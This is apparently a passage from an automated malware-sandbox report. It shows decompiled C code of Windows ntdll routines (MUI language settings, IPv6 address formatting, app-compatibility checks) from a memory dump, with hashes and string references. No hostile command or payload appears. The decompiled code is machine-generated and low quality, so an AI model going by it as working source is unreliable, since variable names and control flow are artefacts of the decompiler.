							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E020B2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E020CE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E020BE2A8(_t322,  &_v68, _v16);
								if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E020CE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E020BE2A8(_t322,  &_v68, _t236);
								if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E020D718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E020BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E020B2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E020CE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E020BE2A8(_v12,  &_v68, _v16);
							if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E020CE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E020BE2A8(_t322,  &_v68, _t269);
							if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E020D718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E020BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E020B2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E020CE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E020BE2A8(_v12,  &_v68, _v16);
						if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E020CE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E020BE2A8(_t322,  &_v68, _t296);
						if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                                                                          0x020d8788
                                                                                                                                                                                                          0x020d8788
                                                                                                                                                                                                          0x020d8791
                                                                                                                                                                                                          0x020d8794
                                                                                                                                                                                                          0x020d8798
                                                                                                                                                                                                          0x020d879b
                                                                                                                                                                                                          0x020d879e
                                                                                                                                                                                                          0x020d87a1
                                                                                                                                                                                                          0x020d87a4
                                                                                                                                                                                                          0x020d87a7
                                                                                                                                                                                                          0x020d87aa
                                                                                                                                                                                                          0x020d87af
                                                                                                                                                                                                          0x02121ad3
                                                                                                                                                                                                          0x020d8b0a
                                                                                                                                                                                                          0x020d8b0d
                                                                                                                                                                                                          0x020d8b13
                                                                                                                                                                                                          0x020d8b19
                                                                                                                                                                                                          0x020d8b1f
                                                                                                                                                                                                          0x020d8b25
                                                                                                                                                                                                          0x020d8b2b
                                                                                                                                                                                                          0x020d8b31
                                                                                                                                                                                                          0x020d8b37
                                                                                                                                                                                                          0x020d8b3d
                                                                                                                                                                                                          0x020d8b46
                                                                                                                                                                                                          0x020d8b46
                                                                                                                                                                                                          0x020d87c6
                                                                                                                                                                                                          0x020d87d0
                                                                                                                                                                                                          0x02121ae0
                                                                                                                                                                                                          0x02121ae6
                                                                                                                                                                                                          0x02121af8
                                                                                                                                                                                                          0x02121af8
                                                                                                                                                                                                          0x02121afd
                                                                                                                                                                                                          0x02121afe
                                                                                                                                                                                                          0x02121b01
                                                                                                                                                                                                          0x02121b06
                                                                                                                                                                                                          0x02121b06
                                                                                                                                                                                                          0x020d87d6
                                                                                                                                                                                                          0x020d87f2
                                                                                                                                                                                                          0x020d87f7
                                                                                                                                                                                                          0x020d8807
                                                                                                                                                                                                          0x020d880a
                                                                                                                                                                                                          0x020d880f
                                                                                                                                                                                                          0x020d8810
                                                                                                                                                                                                          0x020d8813
                                                                                                                                                                                                          0x020d8818
                                                                                                                                                                                                          0x020d8818
                                                                                                                                                                                                          0x020d882c
                                                                                                                                                                                                          0x020d8831
                                                                                                                                                                                                          0x020d8838
                                                                                                                                                                                                          0x020d8908
                                                                                                                                                                                                          0x020d8920
                                                                                                                                                                                                          0x020d89f0
                                                                                                                                                                                                          0x020d8a08
                                                                                                                                                                                                          0x020d8af6
                                                                                                                                                                                                          0x020d8af6
                                                                                                                                                                                                          0x020d8af8
                                                                                                                                                                                                          0x020d8afb
                                                                                                                                                                                                          0x02121beb
                                                                                                                                                                                                          0x02121beb
                                                                                                                                                                                                          0x020d8b04
                                                                                                                                                                                                          0x02121bf8
                                                                                                                                                                                                          0x02121c0e
                                                                                                                                                                                                          0x02121c13
                                                                                                                                                                                                          0x02121c16
                                                                                                                                                                                                          0x02121c16
                                                                                                                                                                                                          0x02121bf8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d8b04
                                                                                                                                                                                                          0x020d8a0e
                                                                                                                                                                                                          0x020d8a11
                                                                                                                                                                                                          0x020d8a14
                                                                                                                                                                                                          0x020d8a15
                                                                                                                                                                                                          0x020d8a18
                                                                                                                                                                                                          0x020d8a22
                                                                                                                                                                                                          0x020d8b59
                                                                                                                                                                                                          0x020d8a28
                                                                                                                                                                                                          0x020d8a3c
                                                                                                                                                                                                          0x020d8a3c
                                                                                                                                                                                                          0x020d8a42
                                                                                                                                                                                                          0x02121bb0
                                                                                                                                                                                                          0x02121b11
                                                                                                                                                                                                          0x02121b11
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d8a48
                                                                                                                                                                                                          0x020d8a51
                                                                                                                                                                                                          0x020d8a5b
                                                                                                                                                                                                          0x020d8a5e
                                                                                                                                                                                                          0x020d8a61
                                                                                                                                                                                                          0x020d8a69
                                                                                                                                                                                                          0x020d8a69
                                                                                                                                                                                                          0x020d8a6d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d8a74
                                                                                                                                                                                                          0x020d8a7c
                                                                                                                                                                                                          0x020d8a7d
                                                                                                                                                                                                          0x020d8a91
                                                                                                                                                                                                          0x020d8a93
                                                                                                                                                                                                          0x020d8a93
                                                                                                                                                                                                          0x020d8a98
                                                                                                                                                                                                          0x020d8a9b
                                                                                                                                                                                                          0x020d8aa1
                                                                                                                                                                                                          0x020d8aa1
                                                                                                                                                                                                          0x020d8aa4
                                                                                                                                                                                                          0x020d8aaa
                                                                                                                                                                                                          0x020d8ab1
                                                                                                                                                                                                          0x020d8ac5
                                                                                                                                                                                                          0x020d8ac7
                                                                                                                                                                                                          0x020d8ac7
                                                                                                                                                                                                          0x020d8ac5
                                                                                                                                                                                                          0x020d8ace
                                                                                                                                                                                                          0x02121bc9
                                                                                                                                                                                                          0x02121bce
                                                                                                                                                                                                          0x02121bd2
                                                                                                                                                                                                          0x02121bd2
                                                                                                                                                                                                          0x020d8ad8
                                                                                                                                                                                                          0x020d8aeb
                                                                                                                                                                                                          0x020d8aeb
                                                                                                                                                                                                          0x020d8af0
                                                                                                                                                                                                          0x020d8af4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d8af4
                                                                                                                                                                                                          0x020d8a42
                                                                                                                                                                                                          0x020d8926
                                                                                                                                                                                                          0x020d8929
                                                                                                                                                                                                          0x020d892c
                                                                                                                                                                                                          0x020d892d
                                                                                                                                                                                                          0x020d8930
                                                                                                                                                                                                          0x020d8935
                                                                                                                                                                                                          0x020d893a
                                                                                                                                                                                                          0x020d8b51
                                                                                                                                                                                                          0x020d8940
                                                                                                                                                                                                          0x020d8954
                                                                                                                                                                                                          0x020d8954
                                                                                                                                                                                                          0x020d895a
                                                                                                                                                                                                          0x02121b63
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d8960
                                                                                                                                                                                                          0x020d8969
                                                                                                                                                                                                          0x020d8973
                                                                                                                                                                                                          0x020d8976
                                                                                                                                                                                                          0x020d8979
                                                                                                                                                                                                          0x020d897e
                                                                                                                                                                                                          0x020d8981
                                                                                                                                                                                                          0x020d8981
                                                                                                                                                                                                          0x020d8986
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02121b6e
                                                                                                                                                                                                          0x02121b74
                                                                                                                                                                                                          0x02121b7b
                                                                                                                                                                                                          0x02121b8f
                                                                                                                                                                                                          0x02121b91
                                                                                                                                                                                                          0x02121b91
                                                                                                                                                                                                          0x02121b99
                                                                                                                                                                                                          0x02121b9c
                                                                                                                                                                                                          0x02121ba2
                                                                                                                                                                                                          0x02121ba2
                                                                                                                                                                                                          0x020d898c
                                                                                                                                                                                                          0x020d8992
                                                                                                                                                                                                          0x020d8999
                                                                                                                                                                                                          0x020d89ad
                                                                                                                                                                                                          0x02121ba8
                                                                                                                                                                                                          0x02121ba8
                                                                                                                                                                                                          0x020d89ad
                                                                                                                                                                                                          0x020d89b6
                                                                                                                                                                                                          0x020d89c8
                                                                                                                                                                                                          0x020d89cd
                                                                                                                                                                                                          0x020d89d0
                                                                                                                                                                                                          0x020d89d0
                                                                                                                                                                                                          0x020d89d6
                                                                                                                                                                                                          0x020d89e8
                                                                                                                                                                                                          0x020d89e8
                                                                                                                                                                                                          0x020d89ed
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d89ed
                                                                                                                                                                                                          0x020d895a
                                                                                                                                                                                                          0x020d883e
                                                                                                                                                                                                          0x020d8841
                                                                                                                                                                                                          0x020d8844
                                                                                                                                                                                                          0x020d8845
                                                                                                                                                                                                          0x020d8848
                                                                                                                                                                                                          0x020d884d
                                                                                                                                                                                                          0x020d8852
                                                                                                                                                                                                          0x020d8b49
                                                                                                                                                                                                          0x020d8858
                                                                                                                                                                                                          0x020d886c
                                                                                                                                                                                                          0x020d886c
                                                                                                                                                                                                          0x020d8872
                                                                                                                                                                                                          0x02121b0e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d8878
                                                                                                                                                                                                          0x020d8881
                                                                                                                                                                                                          0x020d888b
                                                                                                                                                                                                          0x020d888e
                                                                                                                                                                                                          0x020d8891
                                                                                                                                                                                                          0x020d8896
                                                                                                                                                                                                          0x020d8899
                                                                                                                                                                                                          0x020d8899
                                                                                                                                                                                                          0x020d889e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02121b21
                                                                                                                                                                                                          0x02121b27
                                                                                                                                                                                                          0x02121b2e
                                                                                                                                                                                                          0x02121b42
                                                                                                                                                                                                          0x02121b44
                                                                                                                                                                                                          0x02121b44
                                                                                                                                                                                                          0x02121b4c
                                                                                                                                                                                                          0x02121b4f
                                                                                                                                                                                                          0x02121b55
                                                                                                                                                                                                          0x02121b55
                                                                                                                                                                                                          0x020d88a4
                                                                                                                                                                                                          0x020d88aa
                                                                                                                                                                                                          0x020d88b1
                                                                                                                                                                                                          0x020d88c5
                                                                                                                                                                                                          0x02121b5b
                                                                                                                                                                                                          0x02121b5b
                                                                                                                                                                                                          0x020d88c5
                                                                                                                                                                                                          0x020d88ce
                                                                                                                                                                                                          0x020d88e0
                                                                                                                                                                                                          0x020d88e5
                                                                                                                                                                                                          0x020d88e8
                                                                                                                                                                                                          0x020d88e8
                                                                                                                                                                                                          0x020d88ee
                                                                                                                                                                                                          0x020d8900
                                                                                                                                                                                                          0x020d8900
                                                                                                                                                                                                          0x020d8905
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d8905

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • WindowsExcludedProcs, xrefs: 020D87C1
                                                                                                                                                                                                          • Kernel-MUI-Language-Allowed, xrefs: 020D8827
                                                                                                                                                                                                          • Kernel-MUI-Number-Allowed, xrefs: 020D87E6
                                                                                                                                                                                                          • Kernel-MUI-Language-SKU, xrefs: 020D89FC
                                                                                                                                                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 020D8914
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcspbrk
                                                                                                                                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                          • API String ID: 402402107-258546922
                                                                                                                                                                                                          • Opcode ID: e7ae6d9eebe04eabb924efe5d8851a8cac3170d65592820389afeef4e25e2c4d
                                                                                                                                                                                                          • Instruction ID: 7ee43e095a27845c9f1bc5acb915da57a90125981b7c2830322865d4a4abc739
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7ae6d9eebe04eabb924efe5d8851a8cac3170d65592820389afeef4e25e2c4d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27F1E6B1D01309EFDB62DF98C9849EEBBB9FF08304F14846AE505A7211E7359A45EF60
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 020F13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                                          			E020F13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E020E7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x20b2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E020E7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x20b9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E020E7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E020E7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E020E7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E020E7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                                                                          0x020f13d5
                                                                                                                                                                                                          0x020f13d9
                                                                                                                                                                                                          0x020f13dc
                                                                                                                                                                                                          0x020f13de
                                                                                                                                                                                                          0x020f13e1
                                                                                                                                                                                                          0x020f13e8
                                                                                                                                                                                                          0x020f13ee
                                                                                                                                                                                                          0x0211e8fd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211e921
                                                                                                                                                                                                          0x0211e921
                                                                                                                                                                                                          0x0211e928
                                                                                                                                                                                                          0x0211e982
                                                                                                                                                                                                          0x0211e98a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211e99a
                                                                                                                                                                                                          0x0211e99e
                                                                                                                                                                                                          0x0211e9a3
                                                                                                                                                                                                          0x0211e9a8
                                                                                                                                                                                                          0x0211e9b9
                                                                                                                                                                                                          0x0211e978
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211e978
                                                                                                                                                                                                          0x0211e98a
                                                                                                                                                                                                          0x0211e92a
                                                                                                                                                                                                          0x0211e931
                                                                                                                                                                                                          0x0211e944
                                                                                                                                                                                                          0x0211e944
                                                                                                                                                                                                          0x0211e950
                                                                                                                                                                                                          0x0211e954
                                                                                                                                                                                                          0x0211e959
                                                                                                                                                                                                          0x0211e95e
                                                                                                                                                                                                          0x0211e963
                                                                                                                                                                                                          0x0211e970
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211e975
                                                                                                                                                                                                          0x0211e93b
                                                                                                                                                                                                          0x0211e980
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211e980
                                                                                                                                                                                                          0x0211e942
                                                                                                                                                                                                          0x0211e94b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211e94b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211e942
                                                                                                                                                                                                          0x020f13f4
                                                                                                                                                                                                          0x020f13f4
                                                                                                                                                                                                          0x020f13f9
                                                                                                                                                                                                          0x020f13fc
                                                                                                                                                                                                          0x020f13ff
                                                                                                                                                                                                          0x020f1406
                                                                                                                                                                                                          0x0211e9cc
                                                                                                                                                                                                          0x0211e9d2
                                                                                                                                                                                                          0x0211e9d2
                                                                                                                                                                                                          0x0211e9cc
                                                                                                                                                                                                          0x020f140c
                                                                                                                                                                                                          0x020f1411
                                                                                                                                                                                                          0x020f1431
                                                                                                                                                                                                          0x020f143a
                                                                                                                                                                                                          0x020f143c
                                                                                                                                                                                                          0x020f143f
                                                                                                                                                                                                          0x020f143f
                                                                                                                                                                                                          0x020f1442
                                                                                                                                                                                                          0x020f1447
                                                                                                                                                                                                          0x020f14a8
                                                                                                                                                                                                          0x020f14ac
                                                                                                                                                                                                          0x0211e9e2
                                                                                                                                                                                                          0x0211e9e7
                                                                                                                                                                                                          0x0211e9ec
                                                                                                                                                                                                          0x0211ea05
                                                                                                                                                                                                          0x0211ea05
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f1449
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f1449
                                                                                                                                                                                                          0x020f144c
                                                                                                                                                                                                          0x020f1459
                                                                                                                                                                                                          0x020f1462
                                                                                                                                                                                                          0x020f1469
                                                                                                                                                                                                          0x020f146a
                                                                                                                                                                                                          0x020f1470
                                                                                                                                                                                                          0x020f1473
                                                                                                                                                                                                          0x020f1476
                                                                                                                                                                                                          0x020f1476
                                                                                                                                                                                                          0x020f1490
                                                                                                                                                                                                          0x020f1495
                                                                                                                                                                                                          0x020f138e
                                                                                                                                                                                                          0x020f1390
                                                                                                                                                                                                          0x020f1397
                                                                                                                                                                                                          0x020f1398
                                                                                                                                                                                                          0x020f1399
                                                                                                                                                                                                          0x020f13a1
                                                                                                                                                                                                          0x020f13a4
                                                                                                                                                                                                          0x020f13a4
                                                                                                                                                                                                          0x020f1498
                                                                                                                                                                                                          0x020f149c
                                                                                                                                                                                                          0x020f149f
                                                                                                                                                                                                          0x020f14a2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f14a4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f14a4
                                                                                                                                                                                                          0x020f1413
                                                                                                                                                                                                          0x020f1415
                                                                                                                                                                                                          0x020f1416
                                                                                                                                                                                                          0x020f1419
                                                                                                                                                                                                          0x020f141c
                                                                                                                                                                                                          0x020f1422
                                                                                                                                                                                                          0x020f13b7
                                                                                                                                                                                                          0x020f13bc
                                                                                                                                                                                                          0x020f13bf
                                                                                                                                                                                                          0x020f13bf
                                                                                                                                                                                                          0x020f13c2
                                                                                                                                                                                                          0x020f1424
                                                                                                                                                                                                          0x020f1424
                                                                                                                                                                                                          0x020f1424
                                                                                                                                                                                                          0x020f1427
                                                                                                                                                                                                          0x020f142b
                                                                                                                                                                                                          0x020f142c
                                                                                                                                                                                                          0x020f142c
                                                                                                                                                                                                          0x020f142c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f141c
                                                                                                                                                                                                          0x020f1411

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                                                          • Opcode ID: b8f5ab116968ede462a0007400573b9047fc11356d1e75fecad49d58ddd4233f
                                                                                                                                                                                                          • Instruction ID: c1a6b597a33180271ea0272841204055d2878db5b809f9756e78bb10c450640b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8f5ab116968ede462a0007400573b9047fc11356d1e75fecad49d58ddd4233f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D61E371D40759EADF65CF99C8909BEBBF5EF94300B14C12DEA9A46940D334A640EB60
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 020E7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                          			E020E7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2192088; // 0x7750189a
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E020E7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02103F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E020BDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2194218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02103F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E020C0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02103F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
